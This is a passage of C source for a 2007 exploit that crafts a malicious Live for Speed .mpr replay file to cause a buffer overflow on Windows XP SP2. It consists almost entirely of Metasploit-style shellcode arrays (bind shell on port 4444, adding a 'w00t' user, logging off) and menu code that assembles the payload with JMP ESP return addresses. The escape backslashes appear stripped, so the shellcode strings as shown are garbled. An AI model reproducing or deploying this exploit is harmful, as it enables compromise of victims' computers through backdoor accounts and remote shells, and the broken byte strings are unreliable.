"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a";
// win32_adduser PASS=w00t EXITFUNC=seh USER=w00t http://metasploit.com
char adduser_shellcode[]=
"xfcxbbxfbxe2x33x0bxebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffx07x0ax77x0bxf7xcbxf3"
"x4excbx40x7fx54x4bx56x6fxddxe4x40xe4xbdxdax71x11"
"x08x91x46x6ex8ax4bx97xb0x14x3fx5cxf0x53x38x9cx3b"
"x96x47xdcx57x5dx7cxb4x83x9axf7xd1x47xfdxd3x18xb3"
"x64x90x17x08xe2xf9x3bx8fx1fx8ex58x04xdex7bxe9x46"
"xc5x7fx29x47xc5x1bx26xe8xf5x66xf8x91xf9xe3xb9x6d"
"x89x83x25xc3x06x0bx5exf0x10x40xdexb6x23x56xdfx3d"
"x4bx6ax80x70x7axf2x68xfax7ax71x54x87x2ax1dxa5xf2"
"xcfx82x2dx9bx2exb6xa0xccx31x21xdfx9fxa9x83x45x18"
"x57xfbxaaxbbxb7x95xd1x4fx98x1cx69xd5xaaxfexfax25"
"x7bx8ax24x31x4bx42x51x9dx84xe3xddx99xfaxc5xfbx01"
"x95x6cx70x62x05x01x1bx03xb9xbaxa9xacx34x34x6ex72"
"xd3xd9x07x1ax72x52xacx90xe5xe0x23x27x95x28xcbxf7"
"x69x5cx13xd7xc8xd8x17x27xcbxe0x97x27xcb";
//Log user off shell code http://metasploit.com
char Log_off_shellcode[]=
"xfcxbbx25x48xf4xb3xebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffxd9xa0xb0xb3x21x31xb2"
"xf1x1dxbaxb8xfcx25xbdxafx74x9axa5xa4xd4x04xd7x51"
"xa3xcfxe3x2ex35x21x3axf1xafx11xb9x31xbbx6ex03x7b"
"x49x71x41x97xa6x4ax11x4cx43xd9x7cx07x14x05x7exf3"
"xcdxcex8cx48x99x8fx90x4fx76xa4xb5xc4x89x51x4cx86"
"xadxa1x8cx06x6excdx99x29x5ex88x5exd1x92x19x1ex2e"
"x20x6dx83x83xbdxe5xb3x30xc8x7ex43x76xcbx80x44xfc"
"xa4xbcx1bx33xc3xdcxf5xbaxd3x9fx3axc7x73xf7x4axb2"
"x70x58xc3x5bx86xecx1dx0bx88x17x52xdbx03xa3xf1x74"
"x9bx25xdaxa7x0fx99x37xccxefxe9x77x2cxf0x09x78x2c"
"xf0";
int main(){
FILE *File;
int i = 0;
if((File=fopen(Mpr_file,"wb")) == NULL){
printf("fuck We are Unable to build the file %s",Mpr_file);
exit(0);
}
system("cls");
printf("n *************************************************");
printf("n *Live for speed .mpr local file buffer overflow *");
printf("n *************************************************");
printf("n * Special thanks to Str0ke *");
printf("n *************************************************");
printf("n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*");
printf("n * Date : August 1 2007 *");
printf("n *************************************************");
printf("n * Creating .Mpr replay File please wait !! *");
printf("n *************************************************");
Sleep(4000);
system("cls");
{
for(i=0;i<sizeof(file_header1)-1;i++)
fputc(file_header1[i],File);
for (int i=0;i<38;i++)
fputs("A", File);
}
int input;
printf( "[1]. English Jmp_esp win xp sp2 n" );
printf( "[2]. French Call_esp win xp sp2 n" );
printf( "[3]. German Jmp_esp win xp sp2 n" );
printf( "[4]. To exit and canceln" );
printf( "Pick your jmp esp: " );
scanf( "%d", &input );
switch ( input ) {
case 1:
fputs(JMP_ESP_English,File);
break;
case 2:
fputs(CALL_ESP_French,File);
break;
case 3:
fputs(JMP_ESP_German,File);
break;
case 4:
exit(0);
break;
Sleep(500);
}
system("cls");
printf( "[1].Bind to port shell code port 4444n");
printf( "[2].Execute calc.exe shell coden");
printf( "[3].Add user shell code PASS=w00t USER=w00tn");
printf( "[4].Shut down user's computern");
printf( "[5].To exit and canceln" );
printf( "Pick your shell code: " );
scanf( "%d", &input );
switch ( input ) {
case 1:
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],File);
break;
case 2:
for(i=0;i<sizeof(calc_shellcode)-1;i++)
fputc(calc_shellcode[i],File);
break;
case 3:
for(i=0;i<sizeof(adduser_shellcode)-1;i++)
fputc(adduser_shellcode[i],File);
break;
case 4:
for(i=0;i<sizeof(Log_off_shellcode)-1;i++)
fputc(Log_off_shellcode[i],File);
break;
case 5:
exit(0);
break;
}
Sleep(500);
for (int i=0;i<353;i++)
fputs("B", File);
for(i=0;i<sizeof(file_header2)-1;i++)
fputc(file_header2[i],File);
{
fclose(File);
system("cls");
printf("%s successfully created..n",Mpr_file);
printf("%s n",Credits_to);
Sleep(3000);
return 0;
}
}
// www.Syue.com [2007-08-01]